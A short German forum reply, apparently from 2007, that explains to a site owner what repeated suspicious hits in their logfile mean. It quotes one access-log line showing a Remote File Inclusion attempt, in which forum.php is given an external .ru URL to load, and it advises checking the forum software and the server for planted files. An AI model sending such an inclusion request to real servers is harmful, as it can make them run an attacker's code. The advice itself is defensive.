hi $name,

Hallo,

Was sie tun, siehst du im Logfile.

Ja, z.B. das:
87.119.200.212 - - [06/Dec/2007:01:06:59 +0100] "GET //forum.php?seite=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 763 "-" "libwww-perl/5.803" 244 1023

Und das oder ähnliches mehrmals pro Minute.

hoffentlich kommen sie nicht damit durch.
http://en.wikipedia.org/wiki/Remote_File_Inclusion

prüf mal nach ob es eine bekannte sicherheitslücke in deiner forensoftware gibt und ganz wichtig: ob du dateien auf deinem server hast die da nicht hingehören, etc. ach überprüf die ganze kiste, glaub mir ist besser....

gruss
shadow